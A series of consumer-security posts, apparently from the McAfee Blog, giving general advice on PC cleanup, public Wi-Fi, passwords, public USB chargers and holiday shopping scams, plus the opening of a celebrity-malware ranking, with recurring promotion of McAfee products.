If you’re facing issues with your PC’s performance or just want to upkeep it, regular cleaning should be on your to-do list. Cleaning up your PC has several advantages, including speeding up your system and safeguarding your personal information from potential threats. Besides, the process frees up storage space, enabling you to install more programs or store more multimedia files. A monthly clean-up is usually recommended for optimal results. Those who have never cleaned their PC might be in for a pleasant surprise with its much-enhanced speed and improved performance. In this guide, we will explain the ins and outs of PC cleaning to help you on the right path.
Over time, as you store multiple files on your PC, they begin to take up more and more space. Specifically, your C drive might be gradually filling up due to backup files, hidden files, and temporary files. Additionally, even a new PC can benefit from a cleaning since it often comes with pre-installed programs that you might not need. So, what is PC cleaning? Essentially, it involves deleting unneeded files from your system when you want to free up storage space and enhance the overall performance of your PC.
One of the first steps in PC cleaning involves removing unwanted programs. This can be done by accessing the ‘Programs and Features’ section of your control panel. As a necessary measure, go through the list and note down the programs that you don’t use. If you encounter programs you don’t recognize, perform a quick internet search to understand their function before deleting them. Depending on the program’s size, removing them may not take long. Alongside removing unneeded programs, you can also use the disk cleanup utility to remove temporary files, which is another crucial aspect of PC cleaning.
McAfee Pro Tip: You may find Potentially Unwanted Programs (PUP) while cleaning your computer. PUPs are not malware. The big thing to remember is that with PUPs, you’re saying “yes” to the download, even if you’re not fully aware of it because you didn’t read the fine print in the agreements or installation steps. However, Certain PUPs come bundled with spyware like keyloggers and dialers, as well as other software designed to collect your data, putting you at risk of identity theft. On the other hand, some may bombard your device with bothersome advertisements. Learn more about PUPs to avoid downloading them unknowingly.
Temporary files consist of internet cookies and partially downloaded programs that were never installed on your system. Internet cookies store information such as user login credentials and images from websites visited. They primarily identify users and possibly prepare customized web pages or save necessary information. One of the advantages of these cookies is that they save you from entering your login information each time you visit a website. Moreover, web pages and online media you visit are stored in your browser’s cache, speeding up the browsing experience during your next visit.
Your PC automatically stores files from the websites you visit on your hard drive. If not removed, these files accumulate over time and take up a significant amount of space on your PC. People often install programs on their PCs and forget to remove them after use, consuming much more space than they might think. Regular PC cleaning is an effective solution to prevent such issues.
→Dig Deeper: What Is Disk Cleanup And Does It Remove Viruses?
While many believe that deleting files from their hard drive can increase the speed of their PC, the effect might not be as substantial as expected. Your temporary internet files can quicken the speed at which websites load because these files contain images and other media from the websites you visit. Thus, your PC doesn’t have to download them whenever you visit the same websites. However, it’s still a good practice to delete your temporary files occasionally to free up disk space.
Some programs that you download start automatically when you turn your PC on. Although automatic startup processes are beneficial for some programs, having too many can slow down your PC. It’s advisable to manage which apps run automatically during startup to enhance PC performance.
While deleting temporary internet files doesn’t pose much risk, deleting the wrong programs or certain startup items can harm your PC. Start by removing temporary files and reducing startup items to see if there’s a performance improvement. Additionally, when deleting programs, it’s crucial to be fully aware of what you’re deleting to avoid problems later on.
When you delete files from the recycle bin, they remain on your system as the deletion only removes the pointer, not the file itself. Using a file shredder can help you erase such data by overwriting the space with a pattern of 1’s and 0’s. Although this doesn’t necessarily improve performance, it helps ensure compliance with the law and prevents identity theft.
When you own a computer, much like a car, regular maintenance and cleaning are essential. While it might not entirely increase your PC’s speed, it greatly improves efficiency and functionality, making all processes run smoother. This is because each time you visit a webpage, your computer stores all types of files to remember the website and load it faster next time. This cache gets flooded with files over time, slowing down your system. PC cleaning allows your PC to breathe, making it more responsive and liberating the storage space. Significantly, it helps in data management, eliminating all unnecessary data that might be misused or lead to identity theft.
→Dig Deeper: Manage your data this Data Privacy Day
Regular PC cleaning could also potentially save your device from significant damage. Unwanted programs and apps, especially those auto-starting ones, not only consume your system’s resources but also can contain malicious content impacting your PC. Regular cleaning will ensure any potential malware or problematic software is identified and removed promptly, thus adding a layer of protection.
Let’s break down the PC cleaning process to simplify and understand it better. The process commences with uninstalling any unused apps and software. The next step involves clearing out temporary files, such as cache and cookies that accumulate over time and eat up storage space. Some PC cleaning programs also offer registry cleaning, which involves cleaning up the database that holds all the configuration settings for your PC. However, this is not always recommended.
→Dig Deeper: To Disable or Enable Cookies
Startup programs are another key area to look into. Having too many programs that start up when your computer boots can substantially slow down your system. Through PC cleaning, you can manage these programs and ensure only the necessary ones are allowed to auto-start. This will provide a noticeable improvement in your PC’s boot time and overall performance. Lastly, most PC cleaners come equipped with a file shredder that securely deletes sensitive files and ensures they can’t be recovered later. This helps in safeguarding your personal data and optimizing your PC’s performance.
Having a cleaning schedule for your PC enhances its performance over a longer time. A weekly check to scan and remove any threats or malware, monthly cleanup of temporary files, and a deep clean every six months can keep your PC in optimal condition. However, while deleting temporary files and unused applications is generally safe, it’s important to be careful when choosing files or applications to delete since deleting system files or vital applications can cause serious, potentially irreversible, damage to your PC.
It’s advisable to stick to cleaning procedures and tools you understand. Research and be sure of your actions before you delete anything you’re unsure about. Admittedly, this can be a time-consuming and tedious process. Thankfully, dedicated PC cleaning tools can simplify the task, autotomize the process, and eliminate the risk of unwittingly causing damage.
PC cleaning software, like McAfee’s Total Protection, simplifies the process of cleaning your PC. These programs are designed to detect and clear out unnecessary files, manage startup apps, and even clean the registry, often at the press of a button. It’s crucial, though, to choose a reliable and safe PC cleaning software as some can be excessive, doing more harm than good, or even carry malware. Reading reviews and understanding what each feature does is important before using PC cleaning software.
These cleaners usually come with customizable settings to suit your preferences. You can set automatic clean-ups at regular intervals, thus saving time and freeing you from the hassle of remembering to run the cleanup. A good PC cleaner should ideally also come with a file shredder to safely delete sensitive or personal files without leaving a trace.
Cleaning your PC is an essential part of maintaining its performance. While it might not drastically increase your PC’s speed, it contributes to overall efficiency, responsiveness, and longevity. It’s important to approach PC cleaning carefully, deleting with discretion to avoid accidentally removing necessary files or applications. For those who aren’t comfortable doing it manually, reliable PC cleaning software like McAfee Total Protection can simplify the process and save time. Regular cleaning keeps your PC running smoothly, prevents potential threats, and ensures your personal and sensitive information is safe. So, if you haven’t started yet, it’s never too late to begin cleaning your PC and enjoy an optimized computing experience.
The post Does PC Cleaning Improve Performance? appeared first on McAfee Blog.
With the digital lifestyle becoming more prevalent, Wi-Fi connections have become a necessity in our day-to-day lives. We frequently connect our devices to available Wi-Fi at various locations such as hotels, restaurants, cafes, and airports. The ability to be connected anywhere, anytime is extraordinary, but it also presents a significant security concern. Unsecured Wi-Fi networks can expose our personal and sensitive data to potential hackers.
These hackers can gain access to our personal data stored on our devices or observe our online activities, thereby infringing our digital privacy. Sometimes, they purposely set up deceitful free Wi-Fi connections or hotspots to entice unsuspecting users and exploit their data. Therefore, it’s important to understand the risks associated with unsecured Wi-Fi connections and adopt certain preventive measures to ensure the safety of our personal data.
Using free Wi-Fi or hotspots can indeed be convenient for users when they’re away from their secure home networks. However, such networks usually lack proper security measures, rendering them highly susceptible to various cyber attacks. Hackers often target these networks as it is easier to infiltrate and access users’ data.
The most common risk is the interception of data, where hackers can view and steal sensitive information such as usernames, passwords, and credit card details. They can also inject malware into your device through the insecure network, further compromising your data and device’s security. Additionally, the Wi-Fi you’re connecting to might be a rogue hotspot set up by hackers, designed specifically to steal user information. Therefore, the use of such networks should be approached cautiously.
→ Dig Deeper: KRACK Hack Threatens Wi-Fi Security – What it Means for You
McAfee Pro Tip: The most secure Wi-Fi network is the one that remains inactive. Deactivating the Wi-Fi signal on your device ensures that your device remains invisible, preventing your mobile from automatically connecting to any available Wi-Fi network. Pick up more tips on this blog.
Despite these risks, there are several steps that you can take to ensure your cybersecurity while using Wi-Fi connections. Firstly, it’s a good practice to turn off your Wi-Fi when you’re not using it. This prevents your device from automatically connecting to available networks, reducing the risk of connecting to an insecure network. Equally important is avoiding the use of sensitive applications or websites, like online banking services, when connected to a public network.
→ Dig Deeper: Elevate Your Financial Security: How to Safely Bank Online
Another preventive measure is to use only websites that support HTTPS protocol. The usage of HTTPS, as against HTTP, ensures secure communication over the network as the data is encrypted. This reduces the chances of your data being intercepted by hackers. Hence, always look for “HTTPS://” in the address bar of your internet browser before sharing any sensitive information.
For an extra layer of security when using public Wi-Fi or hotspots, you might want to consider investing in a Virtual Private Network (VPN). A VPN encrypts your internet connection, making it virtually impossible for hackers to intercept and view your data. While you’re connected to a VPN, all your network traffic passes through this protected tunnel, and no one—not even your ISP—can see your traffic until it exits the tunnel from the VPN server and enters the public internet.
→ Dig Deeper: On Public Wi-Fi, a VPN is Your Friend
It is also advisable to keep all your devices, browsers, and apps updated with the latest security patches. Hackers frequently exploit known vulnerabilities in outdated software, so ensuring you have the latest updates can help prevent unauthorized access to your data. Enabling automatic updates ensures that your software is always up-to-date, further protecting against potential threats.
→ Dig Deeper: Why Software Updates Are So Important
Protecting your home Wi-Fi is equally important. Always password-protect your home network with a strong, unique password, and consider changing the default user name and password that come with your router. Default logins can be easily found by attackers, making it easier for them to gain unauthorized access. Additionally, changing your router’s default Service Set ID (SSID) can make it more difficult for hackers to identify and target your network.
Another step you can take is to set up a guest network for visitors to your home. This limits their access to your main network, where your sensitive information and devices are connected. Be sure to change the password for your guest network regularly, especially after hosting guests. Lastly, turning off your network when you’re not using it, especially when you’re away from home for extended periods, can reduce the risk of unauthorized access.
→ Dig Deeper: How to Secure Your Home Wi-Fi
Smartphones have become indispensable tools for communication, work, and leisure. However, with the convenience of accessing Wi-Fi networks on these devices comes the responsibility of ensuring their security.
First and foremost, prioritize trusted networks, such as your home or office, over open or public networks. Ensure that your connections are encrypted, preferably using WPA2 or WPA3, for data protection. Create robust, unique passwords for both your Wi-Fi network and your device connections.
Furthermore, employ two-factor authentication (2FA) for added security, especially for accounts linked to Wi-Fi access. Again, a VPN can further bolster your defenses by encrypting your internet traffic, making it indispensable when using public Wi-Fi networks. But it’s also important to keep your mobile device’s software up-to-date to ensure you benefit from the latest security patches.
Finally, be wary of connecting to mobile hotspots created by other devices, as these can pose security risks if not adequately secured, and regularly audit app permissions on your mobile device and restrict access to sensitive data whenever possible.
By following these measures and best practices, you can significantly enhance the security of your mobile devices when connecting to Wi-Fi networks, safeguarding your digital privacy and peace of mind.
With the growing reliance on Wi-Fi connections to access the internet on our devices, it’s crucial to understand the security risks associated with public Wi-Fi or hotspots. Unauthorized access, data interception, and malware infections are some of the key risks when using these connections. However, by adopting appropriate measures such as using secure websites, turning off Wi-Fi when not in use, using VPN, and bolstering home network security, we can significantly mitigate these risks and ensure our personal data’s safety. So the next time you connect to a Wi-Fi network, remember to exercise caution and take steps to protect your personal information.
We encourage you to improve the layers of your digital and device security for optimal protection. Browse McAfee’s software solutions to find the best software that suits your needs.
The post Why Should You be Careful When Using Hotspots or Free Wi-Fi? appeared first on McAfee Blog.
In today’s digital world, the importance of creating and maintaining secure and complex passwords cannot be overstated. A common misconception is that a password only needs to be memorable. Whilst this is a helpful trait, it does a disservice to the importance of having a secure series of characters. This guide will walk you through why “123456” is not an acceptable password, dispel some common password misconceptions, and provide some tips on how to create a secure password.
Security is a necessary concern in the digital age. Every time we create an account, fill out a form, or simply browse the internet, we leave a digital footprint that can be traced back to us. Criminals, hackers, and other malicious parties are constantly hunting for sensitive information they can exploit. This is what makes the creation of secure passwords so vital.
Think of your password as the first line of defense against potential attackers. When your passwords are weak or predictable, like ‘123456’, you effectively leave your front door open to criminals. While it may feel like an inconvenience to memorize complex passwords, consider the potential damage that could be done should your personal or financial information fall into the wrong hands.
→ Dig Deeper: Protect Your Digital Life: Why Strong Passwords Matter
Some may argue that ‘123456’ is a good password because it’s easy to remember. This is a dangerous misconception. ‘123456’ is an extremely common password, and it’s also one of the first combinations that hackers attempt when trying to break into an account. In fact, according to reports, ‘123456’ and ‘password’ are consistently ranked as the most commonly used passwords year after year.
Another reason why ‘123456’ is not a good password is due to its lack of complexity. Many websites and online services require passwords to include a mix of upper and lower-case letters, numbers, and symbols. This requirement is not arbitrary; it’s a method proven to increase the difficulty for hackers attempting to crack your password. Using ‘123456’ as your password doesn’t meet these requirements, making it an easy target for a hacking attempt.
→ Dig Deeper: Six Easy Steps to Help Keep Hackers at Bay
Ensuring that your password adheres to certain safety standards is crucial. Here are some key checks to consider when creating a password:
→ Dig Deeper: Make Your Smart Home a Secure Home Too: Securing Your IoT Smart Home Devices
Your proactive approach to password security is the bedrock of your defense against evolving cyber threats, ensuring your digital life remains safe and sound. Make sure to follow these reminders every time you create and change passwords.
Password managers are specialized tools that generate, store, and autofill complex and unique passwords for various online accounts. They eliminate the need for users to remember and manually enter their passwords, and this not only simplifies the login process but significantly bolsters security. These tools employ strong encryption to safeguard your login credentials, ensuring your passwords remain inaccessible to hackers. Many password managers also offer the convenience of cross-device synchronization, allowing you to access your passwords securely on multiple platforms.
Cybersecurity threats are more sophisticated than ever, and easily guessable passwords are the first vulnerabilities that malicious actors exploit. So, as you aim to make your 123456 passwords more complicated, consider using a password manager to store all your passwords and help you remember them properly.
Changing passwords frequently is a habit we all need to cultivate. Doing so regularly makes it very difficult for cybercriminals to gain access to your personal information. It’s not just about protecting your accounts, but every device that holds your precious data. This habit, though may seem cumbersome initially, will eventually act as a robust shield against potential cyber attacks. Interest in cyber security is rising, and for a good reason. With more of our lives moving online, it’s crucial to stay updated on the latest trends in mobile and digital security. Many resources are available online to help individuals stay safe in the digital world. Maintaining strong, unique passwords and changing them frequently is one of the simplest and most effective ways to safeguard against cyber threats.
The frequency of changing passwords should be tailored to the security sensitivity of the account and the strength of the existing password. For high-security accounts, such as email or online banking, changing passwords every 60 to 90 days is advisable, while moderate-security accounts can be changed every 90 to 180 days. Low-security accounts may require less frequent changes, and immediate password updates are essential if you suspect a compromise. Strong, unique passwords reduce the necessity for frequent changes, and the use of two-factor authentication further enhances account security.
McAfee Pro Tip: In certain circumstances, it might become imperative to change your password without delay, particularly when a malicious actor gains unauthorized access to your account. Learn more about how often you should change your passwords.
‘123456’ is not an acceptable password due to its predictability and lack of complexity. Choosing secure passwords that are complex, unique, and difficult to guess is crucial in safeguarding your online presence. Coupled with regular password changes, using a password management solution, and avoiding default device passwords, you can ensure your personal and financial information remains secure. In the digital age, a secure password is not just a need, but a necessity. A reliable password manager, meanwhile, is a good, functional option to improve password security.
The post 123456 Is Not an Acceptable Password appeared first on McAfee Blog.
It is common knowledge that connecting your devices to public Wi-Fi can expose them to potential malware and other security risks. But have you ever considered the dangers that might be lurking within public USB chargers? In a surprising revelation, researchers at Georgia Tech discovered that public iPhone chargers can be a conduit for malicious apps, posing a significant risk to your data security and privacy.
Interestingly, the malicious apps resulting from public iPhone chargers do not require any downloads or visits to the app store. These apps are installed on your iPhone via the compromised USB chargers. Once installed, they function like conventional malware, controlling your device and potentially accessing sensitive information such as banking login details. They can even intercept your phone calls and remotely control your device. The distinctive aspect of these threats is their delivery method—through seemingly innocuous iPhone chargers.
Despite these alarming characteristics, the threat posed by these malicious apps is not widely recognized or understood. Many people continue to casually plug their iPhones into public USB ports casually, little knowing the potential danger they expose their devices to. In contrast to the common belief that devices locked with a PIN or passcode are safe, these malicious apps can still infiltrate your iPhone if it is unlocked even for a moment.
→ Dig Deeper: How Safe Is Your Android PIN Code?
How exactly do these malicious apps find their way into our iPhones? The scheme was demonstrated by researchers from Georgia Tech, who managed to fool Apple’s security team with a dummy Facebook app containing a hidden malware code. Their experiment showed that when an iPhone connected to a compromised charger is unlocked, the faux Facebook app activates, allowing hackers to take control of the device remotely.
These threats, often called “AutoRun” threats, can make calls, view passwords, alter settings, and perform other operations on your device without your knowledge. The alarming thing about them is that they start executing when a corrupted drive is plugged into a device. Clearly, this poses a unique and powerful threat to smartphones, tablets, PCs, and Macs alike. As our dependence on these devices grows, so does the urgency to understand and prevent such attacks.
→ Dig Deeper: Can Apple Macs Get Viruses?
Though the AutoRun threat may sound like a plot straight out of a sci-fi movie, it is disturbingly real. This McAfee Threats Report revealed that the prevalence of these attacks doubled in one year and continues to rise. Such an escalation underscores the need for increased awareness and caution concerning our device usage.
While the threat experiment conducted by Georgia Tech researchers was staged, the potential for its execution by cybercriminals is very real. Cybercriminals are always looking for weak spots in security systems, and public USB chargers are proving to be one such vulnerability. This is made worse because not many people are aware of this weakness, making them easy targets for cybercriminals.
McAfee Pro Tip: Stay informed about less conventional threats, such as malware that may lurk in unexpected places like chargers, by exploring the wealth of cyber resources available in McAfee’s extensive collection of resources. Dive into our informative blogs and in-depth reports to expand your awareness and understanding of these unconventional risks.
Apple responded promptly to the Georgia Tech experiment and released an update to raise a warning when connecting to unfamiliar USB chargers. However, this warning is often ignored and opens the device to potential threats. So, the safest preventive measure is to avoid using public charging stations.
Moreover, it is advisable not to unlock your devices while charging. Unlocking an iPhone, even momentarily, was key to disseminating the malicious app in the Georgia Tech experiment. If you’ve connected to a public USB charger and want to verify that your device hasn’t been compromised, navigate to Settings > General > Profiles. If you see any unfamiliar names, remove them immediately.
→ Dig Deeper: Protecting the Universal Remote Control of Your Life—Your Smartphone
Public charging stations might seem like a convenient solution, but they come with their own set of risks–malware is one, as mentioned. One of the most practical and secure alternatives to public charging stations is carrying a portable charger, commonly known as a power bank. These devices come in various sizes and capacities, making it easy to find one that suits your needs. Another simple yet effective alternative to public charging stations is to carry your own charging cable. Most people use USB cables that can be connected to power sources like laptops, portable chargers, or even wall outlets.
Along with avoiding public charging stations, it is crucial only to download apps from trusted sources. While the malicious app in the experiment was installed via a compromised charger, caution is still paramount when downloading apps, even over Wi-Fi. Stick to official app stores to lessen the risk of downloading malware-laden apps.
Perhaps the most significant measure to protect against cyber threats is installing comprehensive security on all your devices. A complete solution like McAfee LiveSafe not only protects your devices from the latest forms of malware, spyware, and other viruses and safeguards your identity and valuable data. The ever-evolving tactics of cybercriminals require vigilant and robust security measures.
As our reliance on smartphones and other devices grows, so does the sophistication and prevalence of cyber threats. In this high-risk digital era, awareness and caution are the first steps toward protection. The experimental threat posed by public iPhone chargers underscores the hidden dangers we may unknowingly expose ourselves to. By understanding these threats and implementing protective measures, such as using trusted sources for app downloads and comprehensive security software, we can minimize our vulnerability to such attacks. As we continue to live in an increasingly digital world, it is more important than ever to understand potential threats and take steps to protect ourselves and our valuable data.
Safeguarding your devices, especially those that are an integral part of your daily life and constantly require recharging, is paramount in our increasingly interconnected world. McAfee’s cutting-edge software solutions offer a fortified defense against many online perils.
The post US-B Careful: Public iPhone Chargers Lie in Wait appeared first on McAfee Blog.
The eagerly awaited holiday sales such as Black Friday and Cyber Monday are just around the corner. As consumers, we look forward to getting the best deals online, but we’re not the only ones. Hackers are also keenly anticipating these holidays but for different reasons. They use this period to come up with all sorts of shopping scams that can potentially put a dampener on the holiday spirit for unsuspecting shoppers.
This article provides you with ten tips to keep you and your family safe from online shopping scams this season. These tips will not only help you spot a good deal but also help you avoid falling prey to online scams, thereby ensuring that you keep your finances safe during this shopping season.
A common tactic employed by hackers involves the use of malware hidden in email attachments. During the holiday sales season, they often camouflage their malware in emails that claim to contain offers or shipping notifications. It is important to remember that legitimate retailers and shipping companies will not send offers, promo codes, or tracking numbers as email attachments. Instead, they will mention these details in the body of the email.
Therefore, be wary of any email attachments you receive from retailers or shippers. If something seems off, it probably is. Do not download or open suspicious attachments, as this could potentially lead to a malware attack.
→ Dig Deeper: McAfee Protects Against Suspicious Email Attachments
Scammers often employ a tactic known as “typosquatting,” where they create phony email addresses and URLs that look incredibly similar to the legitimate addresses of well-known companies and retailers. These are often sent via phishing emails, and instead of leading you to great deals, these links can direct you to scam websites that extract your login credentials, payment information, or even directly extract funds from your account when you attempt to place an order through them.
Therefore, it is imperative to double-check all email addresses and URLs before clicking on them. Look out for subtle discrepancies in the spelling or arrangement of characters, as these are often indicators of a scam. If a link or email address seems suspicious, do not click on it.
→ Dig Deeper: How Typosquatting Scams Work
In continuation with the previous point, scammers also set up websites that resemble those run by trusted retailers or brands. These websites often advertise special offers or attractive deals on popular holiday items. However, these are nothing more than a ruse to trick unsuspecting shoppers into divulging their personal and financial information.
These scam websites are often spread through social media, email, and other messaging platforms. It’s crucial to exercise skepticism when encountering such links. Instead of clicking on them, it’s always safer to visit the brand’s official website directly and look for the deal there.
→ Dig Deeper: 8 Ways to Know If Online Stores Are Safe and Legit
Using a robust and comprehensive security software suite while shopping can provide you with additional layers of protection against scams. For instance, web browser protection features can block malicious and suspicious links, reducing the risk of falling prey to malware or a financial scam.
Ensure your antivirus software is up to date and your firewall is enabled. At the same time, enable secure browsing options available in your web browser. These simple steps can go a long way in securing your online shopping experience.
Using the same passwords across multiple platforms is akin to giving hackers a free pass. If they manage to hack into one account, they can potentially gain access to others that share the same password. To avoid this, consider using a password manager. These tools can generate complex and unique passwords for each of your accounts and store them securely, saving you the hassle of remembering them all.
By diversifying your passwords and securing them effectively, you can significantly reduce the risk of becoming a victim of a hack or a scam. The importance of this proactive approach cannot be overstated in today’s interconnected world, where our personal and financial information is often just a few clicks away from prying eyes and malicious intent.
→ Dig Deeper: Strong Password Ideas to Keep Your Information Safe
Two-factor authentication (2FA) is an invaluable tool that adds an extra layer of protection to your accounts. When 2FA is enabled, gaining access to your accounts isn’t as simple as just entering your username and password. Instead, you also need to input a unique, one-time-use code that is typically sent to your phone or email. This code acts as a second password, making your account significantly more secure.
If any of your accounts offer 2FA, it’s crucial to take advantage of this feature. While it might initially seem cumbersome, the added security is well worth the slight inconvenience.
Public Wi-Fi networks, such as those found in coffee shops and other public locations, can be dangerous due to their lack of security. If you shop online through a public Wi-Fi network, you’re essentially broadcasting your private information to anyone who cares to look. To prevent this, consider using a virtual private network (VPN).
VPNs encrypt your internet traffic, securing it against any prying eyes. This encryption protects your passwords, credit card numbers, and other sensitive information from being intercepted and misused. If you frequently shop online in public places, using a VPN is a must.
In the U.S., the Fair Credit Billing Act protects against fraudulent charges on credit cards. Under this act, you can dispute any charges over $50 for goods and services that you never received or were billed incorrectly for. Moreover, many credit card companies offer policies that add to the protections provided by the Fair Credit Billing Act.
However, these protections don’t extend to debit cards. When you use a debit card, the money is immediately drawn from your bank account, making it more difficult to recover in case of fraud. So, for online shopping, it’s safer to use a credit card instead of a debit card.
A virtual credit card can provide an extra layer of security for your online purchases. When you use one of these cards, it generates a temporary card number for each transaction, keeping your real card number safe. However, there are potential downsides to be aware of, such as difficulties with returns and refunds.
Before deciding to use a virtual credit card, understand its pros and cons. Research the policies of the issuing company so you can make an informed decision about whether or not it’s the right choice for you.
Given the number of accounts most of us manage and the rampant incidents of data breaches, it’s crucial to monitor your credit reports for any signs of fraud. An unexpected change in your credit score could indicate that someone has taken out a loan or credit card in your name. If you notice any discrepancies, report them immediately to the credit bureau and to the lender who reported the fraudulent information.
In the U.S., you’re entitled to a free credit report from each of the three major credit bureaus every year. Utilize this service and check your reports regularly. Remember, quickly identifying and reporting fraudulent activity is the key to mitigating its impact.
McAfee Pro Tip: Have you encountered a suspicious charge on your credit card and felt uncertain about the next steps? Get a credit monitoring service to monitor any unusual credit-related transactions that may be a potential sign of identity theft.
As we approach Cyber Monday, it’s important to stay vigilant to protect yourself and your family from online scams. By taking simple precautions like verifying email addresses, resorting to 2FA, using a VPN while shopping on public Wi-Fi, and monitoring your credit reports, you can significantly reduce your chances of falling for an online shopping scam. Additionally, consider employing cybersecurity solutions like McAfee+, which offer robust protection against various online threats. Remember, if a deal seems too good to be true, it probably is. Happy and safe shopping!
The post Cyber Monday: Protect Yourself and Your Family from Online Shopping Scams appeared first on McAfee Blog.
As we gear up to feast with family and friends this Thanksgiving, we prepare our wallets for Black Friday and Cyber Monday. Black Friday and Cyber Monday have practically become holidays themselves, as each year, they immediately shift our attention from turkey and pumpkin pie to holiday shopping. Let’s look at these two holidays and how their popularity can impact users’ online security, and grab a great Black Friday holiday deal from McAfee.
You might be surprised that “Black Friday” was first associated with a financial crisis, not sales shopping. The U.S. gold market crashed on Friday, September 24, 1869, leaving Wall Street bankrupt. In the 1950s, Black Friday was associated with holiday shopping when large crowds of tourists and shoppers flocked to Philadelphia for a big football game. Because of all the chaos, traffic jams, and shoplifting opportunities that arose, police officers could not take the day off, coining it Black Friday. It wasn’t until over 50 years later that Cyber Monday came to fruition when Shop.org coined the term as a way for online retailers to participate in the Black Friday shopping frenzy.
In conclusion, the origins of “Black Friday” are indeed surprising and far removed from the image of holiday shopping extravaganzas that we associate with the term today. These historical roots offer a fascinating perspective on the evolution of consumer culture and the significance of these shopping events in modern times.
Since the origination of these two massive shopping holidays, both have seen incredible growth. Global interest in Black Friday has risen year-over-year, with 117% average growth across the last five years. According to Forbes, 2018’s Black Friday brought in $6.2 billion in online sales alone, while Cyber Monday brought in a record $7.9 billion.
While foot traffic seemed to decrease at brick-and-mortar stores during Cyber Week 2018, more shoppers turned their attention to the Internet to participate in holiday bargain hunting. Throughout this week, sales derived from desktop devices came in at 47%, while mobile purchases made up 45% of revenue and tablet purchases made up 8% of revenue.
So, what does this mean for Black Friday and Cyber Monday shopping this holiday season? In 2023, Adobe Analytics anticipates that Cyber Monday will maintain its status as the most significant shopping day of the season and the year, spurring a historic $12 billion in spending, reflecting a year-over-year increase of 6.1%. Online sales on Black Friday are expected to increase by 5.7% year over year, reaching $9.6 billion, while Thanksgiving is projected to grow by 5.5% year over year, amounting to $5.6 billion in spending.
If one thing’s for sure, this year’s Black Friday and Cyber Monday sales are shaping up to be the biggest ones for shoppers looking to snag some seasonal bargains. However, the uptick in online shopping activity provides cybercriminals the perfect opportunity to wreak havoc on users’ holiday fun, potentially disrupting users’ festive experiences and compromising their online security. In light of this, it is crucial to take proactive measures to safeguard your digital presence. One effective way to do so is by investing in top-tier online protection solutions. McAfee, a renowned leader in the field, offers award-winning cybersecurity solutions designed to shield you from the ever-evolving threats in the digital landscape. Explore the features of our McAfee+ Ultimate and Total Protection and be informed of the latest cyber threats with McAfee Labs.
→ Dig Deeper: McAfee 2023 Threat Predictions: Evolution and Exploitation
With the surge in online shopping during Black Friday and Cyber Monday, cybercriminals are also on high alert, crafting sophisticated scams to trick unsuspecting shoppers. One common form of scam you’ll come across during this time is fraudulent websites. These sites masquerade as reputable online retailers, luring customers with too-good-to-be-true deals. Once shoppers enter their personal and financial data, the criminals behind these sites gain access to the sensitive information, paving the way for identity theft.
Phishing emails are another popular mode of scam during these shopping holidays. Shoppers receive emails that appear to be from legitimate stores advertising incredible deals. The emails typically contain links that direct users to a fraudulent website where their information can be stolen. It’s essential to approach every email suspiciously, checking the sender’s information and avoiding clicking on unsolicited links.
→ Dig Deeper: How to Protect Yourself From Phishing Scams
Thankfully, there are steps you can take to protect yourself when shopping online during Black Friday and Cyber Monday. First, always ensure that the website you’re shopping from is legitimate. Check for the padlock icon in the address bar and “https” in the URL, as these are indicators of a secure site. Steer clear of websites that lack these security features or have misspelled domain names, as they could be fraudulent.
McAfee Pro Tip: When browsing a website, there are several essential cues to consider when assessing its safety. As mentioned, one such indicator is the presence of “https” in the website’s URL. But there are also other tell-tale signs, such as fake lock icons, web copy, web speed, and more. Know how to tell whether a website is safe.
Furthermore, never provide personal or financial information in response to an unsolicited email, even if it appears to be from a trusted source. If the offer seems tempting, visit the retailer’s official website and check if the same deal is available there. Finally, consider installing a reputable antivirus and security software, like McAfee, that can provide real-time protection and alert you when you stumble upon a malicious website or receive a phishing email.
Black Friday and Cyber Monday are prime opportunities for consumers to snag once-a-year deals and for cybercriminals to exploit their eagerness to save. However, being aware of the prevalent scams and knowing how to protect yourself can save you from falling prey to these ploys. Always strive to shop smart and stay safe, and remember that if an offer seems too good to be true, it probably is.
The post Secure Your Black Friday & Cyber Monday Purchases appeared first on McAfee Blog.
Hackers love Ryan Gosling. In fact, hackers use his name as bait more than any other celebrity.
With that, the celebrated star of “Barbie” and umpteen other hit films tops our Hacker Celebrity Hot List for 2023. It’s our annual study that reveals which big-name celebrity searches most often link to malware and risky sites. And this year, we’ve evolved the list. It now includes celebs spotted in deepfake and other AI-driven content.
With Gosling’s high profile this year, it comes as little surprise that he ranked so highly. As we reported earlier this year, “Barbie” was a huge hit for cybercriminals as well. They baited consumers with a rash of ticket scams, download scams, and other attacks that capitalized on the summer hit’s hype.
Months later, searches for Gosling remain high. His portrayal of Ken has scored him a first-ever Billboard Hot 100 song with “I’m Just Ken.” Meanwhile, Ken and Barbie outfits rank among the most popular Halloween costumes for 2023.
And if you’re wondering, Margot Robbie, who starred as Barbie to Gosling’s Ken, ranked number eight on our list. The full top ten breaks down as follows:
The hackers behind these celebrity-driven attacks are after two primary things.
Accordingly, they’ll pair celebrity names with terms like audio book, lyrics, deepfake, free ringtone, free movie, free download, MP4, among others—which generate results that lead to sketchy sites.
In all, they target people who want to download something or get a hold of celebrity-related content in some form. Again, think of the “Barbie” movie scams earlier this year that promoted free downloads of the movie — but of course they were malware and identity theft scams.
Searching for a celebrity name alone didn’t necessarily lead to a list of sketchy results. Our own Chief Technology Officer, Steve Grobman, described the risks well. “We know people are seeking out free content, such as movie downloads, which puts them at risk. If it sounds too good to be true, it generally is and deserves a closer look.” Yet hackers know how hungry people are for celebrity content, and unfortunately some people will go ahead and click those links that promise celebrity-filled content, despite the risks.
Further rounding out the list, we found several big names from sports and popular culture.
Argentine soccer player Lionel Messi comes in at number 18 on the list, who recently made the move to Miami’s Major League Soccer team. Recent retiree and all-time American football great Tom Brady clocked in at number 19, and Travis Kelce, American football tight end for the Kansas City Chiefs, came in at number 22. NBA star Steph Curry at number 23, while Aaron Rogers, another American football legend, came in at number 31. And Serena Williams, a dominant force on the court and in culture, ranked at number 32.
Reality and pop culture favorites also made the top 50, with Andy Cohen of “Real Housewives” fame taking the number 11 slot, followed by Kim Kardashian at number 24, and Tom Sandoval at number 40 on the list.
And for the Swifties out there, Taylor Swift ranked 25 on our list this year.
Thanks to readily available AI tools, cybercriminals have increased both the sophistication and volume of their attacks. It’s no different for these celebrity-based attacks.
According to McAfee researchers, one such AI-driven trend is on the rise: deepfakes. For example, Elon Musk. He hit number six on our list, and our researchers found a significant volume of malicious deepfake content tied to his name — often linked with cryptocurrency scams.
